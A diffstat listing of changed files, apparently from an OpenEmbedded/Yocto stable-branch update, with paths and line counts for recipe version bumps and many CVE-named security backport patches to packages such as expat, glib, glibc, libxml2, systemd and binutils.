-rw-r--r--meta/recipes-core/dbus/dbus-test_1.12.24.bb (renamed from meta/recipes-core/dbus/dbus-test_1.12.16.bb)42
-rw-r--r--meta/recipes-core/dbus/dbus.inc36
-rw-r--r--meta/recipes-core/dbus/dbus/CVE-2020-12049.patch78
-rw-r--r--meta/recipes-core/dbus/dbus/CVE-2023-34969.patch96
-rw-r--r--meta/recipes-core/dbus/dbus_1.12.24.bb (renamed from meta/recipes-core/dbus/dbus_1.12.16.bb)40
-rw-r--r--meta/recipes-core/dropbear/dropbear.inc11
-rw-r--r--meta/recipes-core/dropbear/dropbear/CVE-2020-36254.patch29
-rw-r--r--meta/recipes-core/dropbear/dropbear/CVE-2021-36369.patch145
-rw-r--r--meta/recipes-core/ell/ell_0.33.bb1
-rw-r--r--meta/recipes-core/expat/expat/CVE-2013-0340.patch1758
-rw-r--r--meta/recipes-core/expat/expat/CVE-2021-45960.patch65
-rw-r--r--meta/recipes-core/expat/expat/CVE-2021-46143.patch49
-rw-r--r--meta/recipes-core/expat/expat/CVE-2022-22822-27.patch257
-rw-r--r--meta/recipes-core/expat/expat/CVE-2022-23852.patch33
-rw-r--r--meta/recipes-core/expat/expat/CVE-2022-23990.patch49
-rw-r--r--meta/recipes-core/expat/expat/CVE-2022-25235.patch283
-rw-r--r--meta/recipes-core/expat/expat/CVE-2022-25236.patch129
-rw-r--r--meta/recipes-core/expat/expat/CVE-2022-25313-regression.patch131
-rw-r--r--meta/recipes-core/expat/expat/CVE-2022-25313.patch230
-rw-r--r--meta/recipes-core/expat/expat/CVE-2022-25314.patch32
-rw-r--r--meta/recipes-core/expat/expat/CVE-2022-25315.patch145
-rw-r--r--meta/recipes-core/expat/expat/CVE-2022-40674.patch53
-rw-r--r--meta/recipes-core/expat/expat/CVE-2022-43680.patch33
-rw-r--r--meta/recipes-core/expat/expat/libtool-tag.patch41
-rw-r--r--meta/recipes-core/expat/expat_2.2.9.bb29
-rw-r--r--meta/recipes-core/fts/fts_1.2.7.bb3
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27218.patch129
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-01.patch170
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-02.patch249
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-03.patch131
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-04.patch298
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-05.patch54
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-06.patch101
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-07.patch76
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-08.patch101
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-09.patch100
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-10.patch59
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-11.patch63
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-1.patch36
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-2.patch38
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-4.patch38
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-5.patch100
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg2-1.patch49
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg2-2.patch43
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg2-3.patch232
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-1.patch27
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-2.patch42
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-3.patch57
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-4.patch265
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-5.patch55
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-29499.patch290
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32611-0001.patch89
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32611-0002.patch255
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32636.patch49
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32643.patch154
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0001.patch103
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0002.patch210
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0003.patch417
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0004.patch113
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0005.patch80
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0006.patch396
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0007.patch49
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0008.patch394
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0009.patch97
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0_2.62.6.bb38
-rw-r--r--meta/recipes-core/glib-2.0/glib.inc2
-rw-r--r--meta/recipes-core/glibc/cross-localedef-native_2.31.bb2
-rw-r--r--meta/recipes-core/glibc/glibc-version.inc2
-rw-r--r--meta/recipes-core/glibc/glibc.inc4
-rw-r--r--meta/recipes-core/glibc/glibc/0030-elf-Refactor_dl_update-slotinfo-to-avoid-use-after-free.patch66
-rw-r--r--meta/recipes-core/glibc/glibc/0031-elf-Fix-data-races-in-pthread_create-and-TLS-access-BZ-19329.patch191
-rw-r--r--meta/recipes-core/glibc/glibc/0032-elf-Use-relaxed-atomics-for-racy-accesses-BZ-19329.patch206
-rw-r--r--meta/recipes-core/glibc/glibc/0033-elf-Add-test-case-for-BZ-19329.patch144
-rw-r--r--meta/recipes-core/glibc/glibc/0034-elf-Fix-DTV-gap-reuse-logic-BZ-27135.patch180
-rw-r--r--meta/recipes-core/glibc/glibc/0035-x86_64-Avoid-lazy-relocation-of-tlsdesc-BZ-27137.patch56
-rw-r--r--meta/recipes-core/glibc/glibc/0036-i386-Avoid-lazy-relocation-of-tlsdesc-BZ-27137.patch124
-rw-r--r--meta/recipes-core/glibc/glibc/0037-Avoid-deadlock-between-pthread_create-and-ctors.patch276
-rw-r--r--meta/recipes-core/glibc/glibc/CVE-2019-25013.patch135
-rw-r--r--meta/recipes-core/glibc/glibc/CVE-2020-29562.patch156
-rw-r--r--meta/recipes-core/glibc/glibc/CVE-2021-33574_1.patch68
-rw-r--r--meta/recipes-core/glibc/glibc/CVE-2021-33574_2.patch73
-rw-r--r--meta/recipes-core/glibc/glibc/CVE-2021-38604.patch41
-rw-r--r--meta/recipes-core/glibc/glibc/CVE-2023-0687.patch82
-rw-r--r--meta/recipes-core/glibc/glibc/CVE-2023-4813.patch986
-rw-r--r--meta/recipes-core/glibc/glibc/CVE-2023-4911.patch63
-rw-r--r--meta/recipes-core/glibc/glibc/check-test-wrapper11
-rw-r--r--meta/recipes-core/glibc/glibc_2.31.bb51
-rw-r--r--meta/recipes-core/glibc/ldconfig-native-2.12.1/ldconfig.patch2
-rw-r--r--meta/recipes-core/ifupdown/files/0001-inet6.defn-Added-1-option-to-dhclient-on-upping-an-i.patch65
-rw-r--r--meta/recipes-core/ifupdown/ifupdown_0.8.35.bb4
-rw-r--r--meta/recipes-core/images/build-appliance-image_15.0.0.bb10
-rw-r--r--meta/recipes-core/initrdscripts/files/init-install-efi.sh5
-rwxr-xr-xmeta/recipes-core/initrdscripts/initramfs-framework/finish9
-rw-r--r--meta/recipes-core/initrdscripts/initramfs-framework/rootfs2
-rw-r--r--meta/recipes-core/initrdscripts/initramfs-framework/setup-live2
-rw-r--r--meta/recipes-core/initscripts/initscripts_1.0.bb2
-rw-r--r--meta/recipes-core/kbd/kbd_2.2.0.bb1
-rw-r--r--meta/recipes-core/libxcrypt/libxcrypt.inc2
-rw-r--r--meta/recipes-core/libxml/libxml2/0001-Port-gentest.py-to-Python-3.patch813
-rw-r--r--meta/recipes-core/libxml/libxml2/CVE-2016-3709.patch89
-rw-r--r--meta/recipes-core/libxml/libxml2/CVE-2021-3516.patch35
-rw-r--r--meta/recipes-core/libxml/libxml2/CVE-2021-3517.patch53
-rw-r--r--meta/recipes-core/libxml/libxml2/CVE-2021-3518.patch112
-rw-r--r--meta/recipes-core/libxml/libxml2/CVE-2021-3537.patch50
-rw-r--r--meta/recipes-core/libxml/libxml2/CVE-2021-3541.patch73
-rw-r--r--meta/recipes-core/libxml/libxml2/CVE-2022-23308-fix-regression.patch98
-rw-r--r--meta/recipes-core/libxml/libxml2/CVE-2022-23308.patch204
-rw-r--r--meta/recipes-core/libxml/libxml2/CVE-2022-29824-dependent.patch53
-rw-r--r--meta/recipes-core/libxml/libxml2/CVE-2022-29824.patch348
-rw-r--r--meta/recipes-core/libxml/libxml2/CVE-2022-40303.patch623
-rw-r--r--meta/recipes-core/libxml/libxml2/CVE-2022-40304.patch104
-rw-r--r--meta/recipes-core/libxml/libxml2/CVE-2023-28484.patch79
-rw-r--r--meta/recipes-core/libxml/libxml2/CVE-2023-29469.patch42
-rw-r--r--meta/recipes-core/libxml/libxml2/CVE-2023-39615-0001.patch36
-rw-r--r--meta/recipes-core/libxml/libxml2/CVE-2023-39615-0002.patch71
-rw-r--r--meta/recipes-core/libxml/libxml2/CVE-2023-39615-pre.patch44
-rw-r--r--meta/recipes-core/libxml/libxml2/CVE-2023-45322-1.patch50
-rw-r--r--meta/recipes-core/libxml/libxml2/CVE-2023-45322-2.patch80
-rw-r--r--meta/recipes-core/libxml/libxml2/CVE-2024-25062-pre1.patch38
-rw-r--r--meta/recipes-core/libxml/libxml2/CVE-2024-25062.patch33
-rw-r--r--meta/recipes-core/libxml/libxml2/runtest.patch45
-rw-r--r--meta/recipes-core/libxml/libxml2_2.9.10.bb46
-rw-r--r--meta/recipes-core/meta/buildtools-tarball.bb2
-rw-r--r--meta/recipes-core/meta/cve-update-db-native.bb181
-rw-r--r--meta/recipes-core/meta/cve-update-nvd2-native.bb372
-rw-r--r--meta/recipes-core/musl/libucontext_git.bb2
-rw-r--r--meta/recipes-core/musl/musl-obstack.bb2
-rw-r--r--meta/recipes-core/musl/musl-utils.bb2
-rw-r--r--meta/recipes-core/musl/musl_git.bb2
-rw-r--r--meta/recipes-core/ncurses/files/CVE-2021-39537.patch30
-rw-r--r--meta/recipes-core/ncurses/files/CVE-2022-29458.patch135
-rw-r--r--meta/recipes-core/ncurses/files/CVE-2023-29491.patch45
-rw-r--r--meta/recipes-core/ncurses/files/CVE-2023-50495.patch79
-rw-r--r--meta/recipes-core/ncurses/ncurses.inc2
-rw-r--r--meta/recipes-core/ncurses/ncurses_6.2.bb6
-rw-r--r--meta/recipes-core/os-release/os-release.bb4
-rw-r--r--meta/recipes-core/ovmf/ovmf/0001-Basetools-genffs-fix-gcc12-warning.patch49
-rw-r--r--meta/recipes-core/ovmf/ovmf/0001-Basetools-lzmaenc-fix-gcc12-warning.patch53
-rw-r--r--meta/recipes-core/ovmf/ovmf/0001-Basetools-turn-off-gcc12-warning.patch41
-rw-r--r--meta/recipes-core/ovmf/ovmf/0001-Fix-VLA-parameter-warning.patch51
-rw-r--r--meta/recipes-core/ovmf/ovmf/0001-ovmf-update-path-to-native-BaseTools.patch6
-rw-r--r--meta/recipes-core/ovmf/ovmf/0002-BaseTools-makefile-adjust-to-build-in-under-bitbake.patch32
-rw-r--r--meta/recipes-core/ovmf/ovmf/0003-ovmf-enable-long-path-file.patch6
-rw-r--r--meta/recipes-core/ovmf/ovmf/0004-ovmf-Update-to-latest.patch20
-rw-r--r--meta/recipes-core/ovmf/ovmf_git.bb16
-rw-r--r--meta/recipes-core/packagegroups/packagegroup-core-ssh-dropbear.bb1
-rw-r--r--meta/recipes-core/psplash/files/psplash-start.service1
-rw-r--r--meta/recipes-core/psplash/files/psplash-systemd.service1
-rw-r--r--meta/recipes-core/psplash/psplash_git.bb2
-rw-r--r--meta/recipes-core/systemd/systemd-conf/wired.network1
-rw-r--r--meta/recipes-core/systemd/systemd-conf_244.3.bb3
-rwxr-xr-xmeta/recipes-core/systemd/systemd-systemctl/systemctl22
-rw-r--r--meta/recipes-core/systemd/systemd.inc2
-rw-r--r--meta/recipes-core/systemd/systemd/00-create-volatile.conf1
-rw-r--r--meta/recipes-core/systemd/systemd/CVE-2018-21029.patch120
-rw-r--r--meta/recipes-core/systemd/systemd/CVE-2020-13529.patch42
-rw-r--r--meta/recipes-core/systemd/systemd/CVE-2021-33910.patch67
-rw-r--r--meta/recipes-core/systemd/systemd/CVE-2021-3997-1.patch65
-rw-r--r--meta/recipes-core/systemd/systemd/CVE-2021-3997-2.patch101
-rw-r--r--meta/recipes-core/systemd/systemd/CVE-2021-3997-3.patch266
-rw-r--r--meta/recipes-core/systemd/systemd/CVE-2022-3821.patch47
-rw-r--r--meta/recipes-core/systemd/systemd/CVE-2023-26604-1.patch115
-rw-r--r--meta/recipes-core/systemd/systemd/CVE-2023-26604-2.patch264
-rw-r--r--meta/recipes-core/systemd/systemd/CVE-2023-26604-3.patch182
-rw-r--r--meta/recipes-core/systemd/systemd/CVE-2023-26604-4.patch32
-rw-r--r--meta/recipes-core/systemd/systemd/basic-pass-allocation-info-for-ordered-set-new-and-introd.patch78
-rw-r--r--meta/recipes-core/systemd/systemd/introduce-ordered_set_clear-free-with-destructor.patch35
-rw-r--r--meta/recipes-core/systemd/systemd/network-add-skeleton-of-request-queue.patch285
-rw-r--r--meta/recipes-core/systemd/systemd/network-also-drop-requests-when-link-enters-linger-state.patch50
-rw-r--r--meta/recipes-core/systemd/systemd/network-fix-Link-reference-counter-issue.patch278
-rw-r--r--meta/recipes-core/systemd/systemd/network-merge-link_drop-and-link_detach_from_manager.patch67
-rw-r--r--meta/recipes-core/systemd/systemd/rm-rf-optionally-fsync-after-removing-directory-tree.patch35
-rw-r--r--meta/recipes-core/systemd/systemd/rm-rf-refactor-rm-rf-children-split-out-body-of-directory.patch318
-rw-r--r--meta/recipes-core/systemd/systemd/systemd-pager.sh7
-rw-r--r--meta/recipes-core/systemd/systemd_244.5.bb35
-rw-r--r--meta/recipes-core/udev/eudev_3.2.9.bb1
-rw-r--r--meta/recipes-core/update-rc.d/update-rc.d_0.8.bb4
-rw-r--r--meta/recipes-core/util-linux/util-linux.inc7
-rw-r--r--meta/recipes-core/util-linux/util-linux/CVE-2021-37600.patch33
-rw-r--r--meta/recipes-core/util-linux/util-linux/CVE-2021-3995.patch139
-rw-r--r--meta/recipes-core/util-linux/util-linux/CVE-2021-3996.patch226
-rw-r--r--meta/recipes-core/util-linux/util-linux/CVE-2022-0563.patch161
-rw-r--r--meta/recipes-core/util-linux/util-linux/include-strutils-cleanup-strto-functions.patch270
-rw-r--r--meta/recipes-core/util-linux/util-linux_2.35.1.bb5
-rw-r--r--meta/recipes-core/volatile-binds/files/volatile-binds.service.in2
-rw-r--r--meta/recipes-core/zlib/zlib/CVE-2018-25032.patch347
-rw-r--r--meta/recipes-core/zlib/zlib/CVE-2022-37434.patch44
-rw-r--r--meta/recipes-core/zlib/zlib/CVE-2023-45853.patch40
-rw-r--r--meta/recipes-core/zlib/zlib_1.2.11.bb6
-rw-r--r--meta/recipes-devtools/apt/apt.inc6
-rw-r--r--meta/recipes-devtools/apt/apt/CVE-2020-3810.patch174
-rw-r--r--meta/recipes-devtools/binutils/binutils-2.34.inc18
-rw-r--r--meta/recipes-devtools/binutils/binutils/0001-CVE-2021-45078.patch257
-rw-r--r--meta/recipes-devtools/binutils/binutils/0009-warn-for-uses-of-system-directories-when-cross-linki.patch26
-rw-r--r--meta/recipes-devtools/binutils/binutils/0018-Include-members-in-the-variable-table-used-when-reso.patch32
-rw-r--r--meta/recipes-devtools/binutils/binutils/CVE-2020-16593.patch204
-rw-r--r--meta/recipes-devtools/binutils/binutils/CVE-2021-20197.patch572
-rw-r--r--meta/recipes-devtools/binutils/binutils/CVE-2021-3487.patch83
-rw-r--r--meta/recipes-devtools/binutils/binutils/CVE-2021-3549.patch183
-rw-r--r--meta/recipes-devtools/binutils/binutils/CVE-2021-46174.patch35
-rw-r--r--meta/recipes-devtools/binutils/binutils/CVE-2022-38533.patch37
-rw-r--r--meta/recipes-devtools/binutils/binutils/CVE-2022-47007.patch32
-rw-r--r--meta/recipes-devtools/binutils/binutils/CVE-2022-47008.patch64
-rw-r--r--meta/recipes-devtools/binutils/binutils/CVE-2022-47010.patch34
-rw-r--r--meta/recipes-devtools/binutils/binutils/CVE-2022-47011.patch31
-rw-r--r--meta/recipes-devtools/binutils/binutils/CVE-2022-47695.patch57
-rw-r--r--meta/recipes-devtools/binutils/binutils/CVE-2022-48063.patch49
-rw-r--r--meta/recipes-devtools/binutils/binutils/CVE-2023-25584.patch530
-rw-r--r--meta/recipes-devtools/binutils/binutils/CVE-2023-25588.patch149
-rw-r--r--meta/recipes-devtools/bootchart2/bootchart2/0001-bootchartd.in-make-sure-only-one-bootchartd-process.patch68
-rw-r--r--meta/recipes-devtools/bootchart2/bootchart2_0.14.9.bb (renamed from meta/recipes-devtools/bootchart2/bootchart2_0.14.8.bb)8
-rw-r--r--meta/recipes-devtools/btrfs-tools/btrfs-tools_5.4.1.bb2
-rw-r--r--meta/recipes-devtools/build-compare/build-compare_git.bb2
-rw-r--r--meta/recipes-devtools/cdrtools/cdrtools-native_3.01.bb1
-rw-r--r--meta/recipes-devtools/cmake/cmake-native_3.16.5.bb1
-rw-r--r--meta/recipes-devtools/cmake/cmake/0006-cmake-FindGTest-Add-target-for-gmock-library.patch255
-rw-r--r--meta/recipes-devtools/cmake/cmake/OEToolchainConfig.cmake9
-rw-r--r--meta/recipes-devtools/createrepo-c/createrepo-c_0.15.7.bb2
-rw-r--r--meta/recipes-devtools/dejagnu/dejagnu_1.6.2.bb2
-rw-r--r--meta/recipes-devtools/desktop-file-utils/desktop-file-utils_0.24.bb3
-rw-r--r--meta/recipes-devtools/devel-config/distcc-config.bb1
-rw-r--r--meta/recipes-devtools/distcc/distcc_3.3.3.bb3
-rw-r--r--meta/recipes-devtools/dmidecode/dmidecode/CVE-2023-30630-dependent_p1.patch236
-rw-r--r--meta/recipes-devtools/dmidecode/dmidecode/CVE-2023-30630-dependent_p2.patch198
-rw-r--r--meta/recipes-devtools/dmidecode/dmidecode/CVE-2023-30630.patch62
-rw-r--r--meta/recipes-devtools/dmidecode/dmidecode_3.2.bb4
-rw-r--r--meta/recipes-devtools/dnf/dnf/0040-Keep-installed-packages-in-upgrade-job-RhBug-1728252.patch60
-rw-r--r--meta/recipes-devtools/dnf/dnf_4.2.2.bb4
-rw-r--r--meta/recipes-devtools/dpkg/dpkg.inc2
-rw-r--r--meta/recipes-devtools/dpkg/dpkg_1.19.8.bb (renamed from meta/recipes-devtools/dpkg/dpkg_1.19.7.bb)4
-rw-r--r--meta/recipes-devtools/dwarfsrcfiles/dwarfsrcfiles.bb1
-rw-r--r--meta/recipes-devtools/dwarfsrcfiles/files/dwarfsrcfiles.c13
-rw-r--r--meta/recipes-devtools/e2fsprogs/e2fsprogs.inc4
-rw-r--r--meta/recipes-devtools/e2fsprogs/e2fsprogs/0001-e2fsck-don-t-try-to-rehash-a-deleted-directory.patch49
-rw-r--r--meta/recipes-devtools/e2fsprogs/e2fsprogs/0001-misc-create_inode.c-set-dir-s-mode-correctly.patch41
-rw-r--r--meta/recipes-devtools/e2fsprogs/e2fsprogs/CVE-2019-5188.patch57
-rw-r--r--meta/recipes-devtools/e2fsprogs/e2fsprogs/CVE-2022-1304.patch42
-rw-r--r--meta/recipes-devtools/e2fsprogs/e2fsprogs/big-inodes-for-small-fs.patch22
-rw-r--r--meta/recipes-devtools/e2fsprogs/e2fsprogs/e2fsck-fix-use-after-free-in-calculate_tree.patch76
-rw-r--r--meta/recipes-devtools/e2fsprogs/e2fsprogs/e2fsprogs-fix-missing-check-for-permission-denied.patch2
-rw-r--r--meta/recipes-devtools/e2fsprogs/e2fsprogs/quiet-debugfs.patch2
-rw-r--r--meta/recipes-devtools/e2fsprogs/e2fsprogs/run-ptest1
-rw-r--r--meta/recipes-devtools/e2fsprogs/e2fsprogs_1.45.7.bb (renamed from meta/recipes-devtools/e2fsprogs/e2fsprogs_1.45.4.bb)16
-rw-r--r--meta/recipes-devtools/elfutils/elfutils_0.178.bb2
-rw-r--r--meta/recipes-devtools/elfutils/files/CVE-2021-33294.patch72
-rw-r--r--meta/recipes-devtools/fdisk/gptfdisk_1.0.4.bb1
-rw-r--r--meta/recipes-devtools/file/file_5.38.bb2
-rw-r--r--meta/recipes-devtools/flex/flex_2.6.4.bb5
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.3/0001-Backport-fix-for-PR-tree-optimization-97236-fix-bad-.patch119
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.3/0001-aarch64-New-Straight-Line-Speculation-SLS-mitigation.patch204
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.3/0002-aarch64-Introduce-SLS-mitigation-for-RET-and-BR-inst.patch600
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.3/0003-aarch64-Mitigate-SLS-for-BLR-instruction.patch659
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5.inc (renamed from meta/recipes-devtools/gcc/gcc-9.3.inc)19
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0001-gcc-4.3.1-ARCH_FLAGS_FOR_TARGET.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0001-gcc-4.3.1-ARCH_FLAGS_FOR_TARGET.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0002-gcc-poison-system-directories.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0002-gcc-poison-system-directories.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0002-libstdc-Fix-inconsistent-noexcept-specific-for-valar.patch44
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0003-gcc-4.3.3-SYSROOT_CFLAGS_FOR_TARGET.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0003-gcc-4.3.3-SYSROOT_CFLAGS_FOR_TARGET.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0004-64-bit-multilib-hack.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0004-64-bit-multilib-hack.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0005-optional-libstdc.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0005-optional-libstdc.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0006-COLLECT_GCC_OPTIONS.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0006-COLLECT_GCC_OPTIONS.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0007-Use-the-defaults.h-in-B-instead-of-S-and-t-oe-in-B.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0007-Use-the-defaults.h-in-B-instead-of-S-and-t-oe-in-B.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0008-fortran-cross-compile-hack.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0008-fortran-cross-compile-hack.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0009-cpp-honor-sysroot.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0009-cpp-honor-sysroot.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0010-MIPS64-Default-to-N64-ABI.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0010-MIPS64-Default-to-N64-ABI.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0011-Define-GLIBC_DYNAMIC_LINKER-and-UCLIBC_DYNAMIC_LINKE.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0011-Define-GLIBC_DYNAMIC_LINKER-and-UCLIBC_DYNAMIC_LINKE.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0012-gcc-Fix-argument-list-too-long-error.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0012-gcc-Fix-argument-list-too-long-error.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0013-Disable-sdt.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0013-Disable-sdt.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0014-libtool.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0014-libtool.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0015-gcc-armv4-pass-fix-v4bx-to-linker-to-support-EABI.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0015-gcc-armv4-pass-fix-v4bx-to-linker-to-support-EABI.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0016-Use-the-multilib-config-files-from-B-instead-of-usin.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0016-Use-the-multilib-config-files-from-B-instead-of-usin.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0017-Avoid-using-libdir-from-.la-which-usually-points-to-.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0017-Avoid-using-libdir-from-.la-which-usually-points-to-.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0018-export-CPP.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0018-export-CPP.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0019-Ensure-target-gcc-headers-can-be-included.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0019-Ensure-target-gcc-headers-can-be-included.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0020-gcc-4.8-won-t-build-with-disable-dependency-tracking.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0020-gcc-4.8-won-t-build-with-disable-dependency-tracking.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0021-Don-t-search-host-directory-during-relink-if-inst_pr.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0021-Don-t-search-host-directory-during-relink-if-inst_pr.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0022-Use-SYSTEMLIBS_DIR-replacement-instead-of-hardcoding.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0022-Use-SYSTEMLIBS_DIR-replacement-instead-of-hardcoding.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0023-aarch64-Add-support-for-musl-ldso.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0023-aarch64-Add-support-for-musl-ldso.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0024-libcc1-fix-libcc1-s-install-path-and-rpath.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0024-libcc1-fix-libcc1-s-install-path-and-rpath.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0025-handle-sysroot-support-for-nativesdk-gcc.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0025-handle-sysroot-support-for-nativesdk-gcc.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0026-Search-target-sysroot-gcc-version-specific-dirs-with.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0026-Search-target-sysroot-gcc-version-specific-dirs-with.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0027-Fix-various-_FOR_BUILD-and-related-variables.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0027-Fix-various-_FOR_BUILD-and-related-variables.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0028-nios2-Define-MUSL_DYNAMIC_LINKER.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0028-nios2-Define-MUSL_DYNAMIC_LINKER.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0029-Add-ssp_nonshared-to-link-commandline-for-musl-targe.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0029-Add-ssp_nonshared-to-link-commandline-for-musl-targe.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0030-ldbl128-config.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0030-ldbl128-config.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0031-Link-libgcc-using-LDFLAGS-not-just-SHLIB_LDFLAGS.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0031-Link-libgcc-using-LDFLAGS-not-just-SHLIB_LDFLAGS.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0032-libgcc_s-Use-alias-for-__cpu_indicator_init-instead-.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0032-libgcc_s-Use-alias-for-__cpu_indicator_init-instead-.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0033-sync-gcc-stddef.h-with-musl.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0033-sync-gcc-stddef.h-with-musl.patch)0
